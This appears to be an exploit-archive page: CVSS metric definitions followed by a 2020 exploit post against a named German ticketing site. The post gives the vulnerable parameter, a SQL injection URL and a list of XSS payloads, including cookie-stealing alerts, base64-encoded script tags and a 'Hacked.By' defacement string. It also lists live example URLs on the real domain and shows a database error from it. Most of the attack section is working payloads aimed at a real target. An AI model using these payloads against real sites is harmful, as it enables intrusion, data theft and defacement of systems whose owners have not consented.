The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
Low
PR
The attacker requires privileges that provide basic capabilities that are typically limited to settings and resources owned by a single low-privileged user. Alternatively, an attacker with Low privileges has the ability to access only non-sensitive resources.
Scope
S
An exploited vulnerability can affect resources beyond the security scope managed by the security authority that is managing the vulnerable component. This is often referred to as a 'privilege escalation,' where the attacker can use the exploited vulnerability to gain control of resources that were not intended or authorized.
Confidentiality
High
C
There is total information disclosure, resulting in all data on the system being revealed to the attacker, or there is a possibility of the attacker gaining control over confidential data.
Integrity
High
I
There is a total compromise of system integrity. There is a complete loss of system protection, resulting in the attacker being able to modify any file on the target system.
Availability
High
A
There is a total shutdown of the affected resource. The attacker can deny access to the system or data, potentially causing significant loss to the organization.
Below is a copy: TicketAgenten Germany XSS SQL Injection
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# Exploit Title : TicketAgenten Germany XSS SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 31/01/2020
# Vendor Homepage : ticketagenten.de
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
CWE-79 [ Improper Neutralization of Input During
Web Page Generation ('Cross-site Scripting') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
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# Impact :
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TicketAgenten Germany is prone to an SQL-injection vulnerability because it fails to sufficiently
sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow
an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities
in the underlying database. A remote attacker can send a specially crafted request to the vulnerable
application and execute arbitrary SQL commands in application`s database.
Further exploitation of this vulnerability may result in unauthorized data manipulation.
An attacker can exploit this issue using a browser or with any SQL Injector Tool.
Reflected XSS (or Non-Persistent) :
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The server reads data directly from the HTTP request and reflects it back in the HTTP response.
Reflected XSS exploits occur when an attacker causes a victim to supply dangerous content
to a vulnerable web application, which is then reflected back to the victim and executed by the
web browser. The most common mechanism for delivering malicious content is to include
it as a parameter in a URL that is posted publicly or e-mailed directly to the victim.
URLs constructed in this manner constitute the core of many phishing schemes, whereby
an attacker convinces a victim to visit a URL that refers to a vulnerable site. After the site reflects
the attacker's content back to the victim,the content is executed by the victim's browser.
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# SQL Vulnerable Parameter :
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&count=
# SQL Injection Exploit :
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/stepone/system/clip_command.php?action=linkall&count=[SQL Injection]
# Cross Site Scripting XSS Exploit :
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/stepone/system/clip_command.php?action=linkall&count=%22%3E--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E%20HTTP/1.1
1%27<marquee><font%20color=lime%20size=32>Hacked.By.KingSkrupellos.</font></marquee>
"><script>alert(String.fromCharCode(88,83,83))</script>
">--></SCRIPT>KingSkrupellos<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>%20HTTP/1.1
<ScRipT>alert("XSS");</ScRipT>
"><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script>
><ScRiPt>alert(document.cookie)</script>
data:text/html,<script>alert(0)</script>
<script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
<svg onload=alert(1)//
<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>
"`'><script>\xE2\x80\x84javascript:alert(1)</script>
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# Example Vulnerable Sites :
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[+] ticketagenten.de/stepone/system/clip_command.php?action=linkall&count=1%27
[+] ticketagenten.de/stepone/system/clip_command.php?action=linkall&count=%22%3E--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E%20HTTP/1.1
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# Example SQL Database Error :
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queryParser: SELECT MAX(structure_position) AS position FROM
KBStructure_relation WHERE kbstructure_i
User Warning kbdbobject: You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the
right syntax to use near '' at line 1
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# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
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